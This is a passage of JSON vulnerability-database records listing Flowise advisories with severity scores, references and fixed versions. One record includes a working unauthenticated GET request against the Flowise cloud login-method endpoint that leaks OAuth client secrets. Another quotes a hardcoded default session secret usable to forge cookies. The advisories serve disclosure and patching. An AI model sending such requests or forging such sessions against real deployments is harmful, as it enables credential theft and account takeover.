"http://public2.vulnerablecode.io/api/packages/40319?format=api", "purl": "pkg:npm/flowise@3.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13" } ], "aliases": [ "GHSA-x2g5-fvc2-gqvp" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9bht-svq8-87b4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359914?format=api", "vulnerability_id": "VCID-a1e4-f5dh-w3a5", "summary": "Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request\n### Summary\nI have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext.\n\n\n### PoC\nThe following request can be sent by anyone on the internet without any cookies or authorization headers.\n\nRequest\n```http\nGET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2\nHost: cloud.flowiseai.com\nAccept: application/json\nContent-Type: application/json\n```\n\nResponse: The server returns 200 OK with sensitive credentials:\n```json\n{\n \"providers\": [\n {\n \"id\": \"a04ba769-b810-481d-8d6b-84f8c377dea5\",\n \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n \"name\": \"azure\",\n \"config\": {\n \"tenantID\": \"\",\n \"clientID\": \"\",\n \"clientSecret\": \"\"\n },\n \"status\": \"disable\",\n \"createdDate\": \"2025-12-26T18:52:33.453Z\",\n \"updatedDate\": \"2025-12-26T19:31:56.087Z\",\n \"createdBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\",\n \"updatedBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\"\n },\n {\n \"id\": \"eda8bd90-1c45-4aca-933f-3a53d9be4161\",\n \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n \"name\": \"google\",\n \"config\": {\n \"clientID\": \"123455\",\n \"clientSecret\": \"123455\"\n },\n \"status\": \"enable\",\n \"createdDate\": \"2025-12-26T18:52:33.453Z\",\n \"updatedDate\": \"2025-12-26T19:31:56.087Z\",\n \"createdBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\",\n \"updatedBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\"\n },\n {\n \"id\": \"0d238df0-c89c-4733-bf57-6ec06f58c7e7\",\n \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n \"name\": \"auth0\",\n \"config\": {\n \"domain\": \"\",\n \"clientID\": \"\",\n \"clientSecret\": \"\"\n },\n \"status\": \"disable\",\n \"createdDate\": \"2025-12-26T18:52:33.453Z\",\n \"updatedDate\": \"2025-12-26T19:31:56.087Z\",\n \"createdBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\",\n \"updatedBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\"\n },\n {\n \"id\": \"e060ae88-c7f4-4b7c-9bdc-5321963a1648\",\n \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n \"name\": \"github\",\n \"config\": {\n \"clientID\": \"\",\n \"clientSecret\": \"\"\n },\n \"status\": \"disable\",\n \"createdDate\": \"2025-12-26T18:52:33.453Z\",\n \"updatedDate\": \"2025-12-26T19:31:56.087Z\",\n \"createdBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\",\n \"updatedBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\"\n }\n ],\n \"callbacks\": [\n {\n \"providerName\": \"azure\",\n \"callbackURL\": \"https://cloud.flowiseai.com/api/v1/azure/callback\"\n },\n {\n \"providerName\": \"google\",\n \"callbackURL\": \"https://cloud.flowiseai.com/api/v1/google/callback\"\n },\n {\n \"providerName\": \"auth0\",\n \"callbackURL\": \"https://cloud.flowiseai.com/api/v1/auth0/callback\"\n },\n {\n \"providerName\": \"github\",\n \"callbackURL\": \"https://cloud.flowiseai.com/api/v1/github/callback\"\n }\n ]\n}\n```\n### Affected Deployments\n- FlowiseAI Cloud (cloud.flowiseai.com)\n- Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed\n\n### Impact\nAn unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization's third-party integrations and potential data breaches.", "references": [ { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6pcv-j4jx-m4vx", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6pcv-j4jx-m4vx" }, { "reference_url": "https://github.com/advisories/GHSA-6pcv-j4jx-m4vx", "reference_id": "GHSA-6pcv-j4jx-m4vx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6pcv-j4jx-m4vx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "GHSA-6pcv-j4jx-m4vx" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a1e4-f5dh-w3a5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/110150?format=api", "vulnerability_id": "VCID-abyp-yn76-1yfp", "summary": "Flowise v3.0.1 < 3.0.8 and all versions after with 'ALLOW_BUILTIN_DEP' enabled contain an authenticated remote code execution vulnerability and node VM sandbox escape due to insecure use of integrated modules (Puppeteer and Playwright) within the nodevm execution environment. An authenticated attacker able to create or run a tool that leverages Puppeteer/Playwright can specify attacker-controlled browser binary paths and parameters. When the tool executes, the attacker-controlled executable/parameters are run on the host and circumvent the intended nodevm sandbox restrictions, resulting in execution of arbitrary code in the context of the host. This vulnerability was incorrectly assigned as a duplicate CVE-2025-26319 by the developers and should be considered distinct from that identifier.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-34267", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01665", "scoring_system": "epss", "scoring_elements": "0.82497", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-34267" }, { "reference_url": "https://flowiseai.com", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://flowiseai.com" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/pull/5231", "reference_id": "5231", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T20:32:58Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/pull/5231" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34267", "reference_id": "CVE-2025-34267", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34267" }, { "reference_url": "https://flowiseai.com/", "reference_id": "flowiseai.com", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T20:32:58Z/" } ], "url": "https://flowiseai.com/" }, { "reference_url": "https://www.vulncheck.com/advisories/flowise-auth-command-execution-and-sandbox-bypass-via-puppeteer-and-playwright-packages", "reference_id": "flowise-auth-command-execution-and-sandbox-bypass-via-puppeteer-and-playwright-packages", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T20:32:58Z/" } ], "url": "https://www.vulncheck.com/advisories/flowise-auth-command-execution-and-sandbox-bypass-via-puppeteer-and-playwright-packages" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5w3r-f6gm-c25w", "reference_id": "GHSA-5w3r-f6gm-c25w", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T20:32:58Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5w3r-f6gm-c25w" }, { "reference_url": "https://github.com/advisories/GHSA-r4hh-pcgx-j5r2", "reference_id": "GHSA-r4hh-pcgx-j5r2", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r4hh-pcgx-j5r2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34082?format=api", "purl": "pkg:npm/flowise@3.0.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8" } ], "aliases": [ "CVE-2025-34267", "GHSA-r4hh-pcgx-j5r2" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-abyp-yn76-1yfp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/66317?format=api", "vulnerability_id": "VCID-affy-v76q-fub6", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, unauthenticated users can inject arbitrary values into internal database fields when creating leads. This issue has been patched in version 3.0.13.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30822", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00455", "scoring_system": "epss", "scoring_elements": "0.64279", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30822" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30822", "reference_id": "CVE-2026-30822", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30822" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13", "reference_id": "flowise%403.0.13", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:34:26Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13" }, { "reference_url": "https://github.com/advisories/GHSA-mq4r-h2gh-qv7x", "reference_id": "GHSA-mq4r-h2gh-qv7x", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mq4r-h2gh-qv7x" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-mq4r-h2gh-qv7x", "reference_id": "GHSA-mq4r-h2gh-qv7x", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:34:26Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-mq4r-h2gh-qv7x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api", "purl": "pkg:npm/flowise@3.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13" } ], "aliases": [ "CVE-2026-30822", "GHSA-mq4r-h2gh-qv7x" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-affy-v76q-fub6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80643?format=api", "vulnerability_id": "VCID-aqg8-6us7-uqef", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, /api/v1/public-chatbotConfig/:id ep exposes sensitive data including API keys, HTTP authorization headers and internal configuration without any authentication. An attacker with knowledge just of a chatflow UUID can retrieve credentials stored in password type fields and HTTP headers, leading to credential theft and more. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41266", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00107", "scoring_system": "epss", "scoring_elements": "0.28509", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41266" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41266", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41266" }, { "reference_url": "https://github.com/advisories/GHSA-4jpm-cgx2-8h37", "reference_id": "GHSA-4jpm-cgx2-8h37", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4jpm-cgx2-8h37" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-4jpm-cgx2-8h37", "reference_id": "GHSA-4jpm-cgx2-8h37", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:26:39Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-4jpm-cgx2-8h37" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41266", "GHSA-4jpm-cgx2-8h37" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-aqg8-6us7-uqef" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80932?format=api", "vulnerability_id": "VCID-b97u-efzx-dffn", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the GraphCypherQAChain node forwards user-provided input directly into the Cypher query execution pipeline without proper sanitization. An attacker can inject arbitrary Cypher commands that are executed on the underlying Neo4j database, enabling data exfiltration, modification, or deletion. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41274", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00232", "scoring_system": "epss", "scoring_elements": "0.46162", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41274" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41274", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41274" }, { "reference_url": "https://github.com/advisories/GHSA-28g4-38q8-3cwc", "reference_id": "GHSA-28g4-38q8-3cwc", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-28g4-38q8-3cwc" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-28g4-38q8-3cwc", "reference_id": "GHSA-28g4-38q8-3cwc", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-24T16:20:30Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-28g4-38q8-3cwc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41274", "GHSA-28g4-38q8-3cwc" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b97u-efzx-dffn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359967?format=api", "vulnerability_id": "VCID-bkmk-k9mn-ekhx", "summary": "Flowise: Weak Default Express Session Secret\n**Detection Method:** Kolega.dev Deep Code Scan\n\n| Attribute | Value |\n|---|---|\n| Location | packages/server/src/enterprise/middleware/passport/index.ts:55 |\n| Practical Exploitability | High |\n| Developer Approver | faizan@kolega.ai |\n\n### Description\nExpress session secret has a weak default value 'flowise' when EXPRESS_SESSION_SECRET is not set.\n\n### Affected Code\n```\nsecret: process.env.EXPRESS_SESSION_SECRET || 'flowise'\n```\n\n### Evidence\nThe default session secret 'flowise' is publicly visible and weak. Session cookies signed with this secret can be forged by attackers.\n\n### Impact\nSession hijacking and forgery - attackers can create arbitrary session cookies to impersonate any user, bypassing all authentication mechanisms.\n\n### Recommendation\nRequire EXPRESS_SESSION_SECRET to be set with a strong random value. Throw an error on startup if not configured. Use cryptographically strong random strings (minimum 256 bits).\n\n### Notes\nThe Express session secret defaults to the string 'flowise' when EXPRESS_SESSION_SECRET is not set (line 55). This secret is used to sign session cookies via express-session middleware. Since 'flowise' is publicly visible in the source code, an attacker can forge valid session cookies to impersonate any user without authentication. The .env.example file has this commented out (# EXPRESS_SESSION_SECRET=flowise), implying it's optional, which compounds the risk. Unlike development-only defaults, this code path is active in production if the environment variable is not set. The application should require EXPRESS_SESSION_SECRET to be explicitly configured with a cryptographically strong random value and fail to start otherwise.", "references": [ { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2qqc-p94c-hxwh", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2qqc-p94c-hxwh" }, { "reference_url": "https://github.com/advisories/GHSA-2qqc-p94c-hxwh", "reference_id": "GHSA-2qqc-p94c-hxwh", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2qqc-p94c-hxwh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "GHSA-2qqc-p94c-hxwh" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bkmk-k9mn-ekhx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359243?format=api", "vulnerability_id": "VCID-d4wa-szeh-43ab", "summary": "", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41267", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00828", "scoring_system": "epss", "scoring_elements": "0.74961", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41267" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-48m6-ch88-55mj", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": 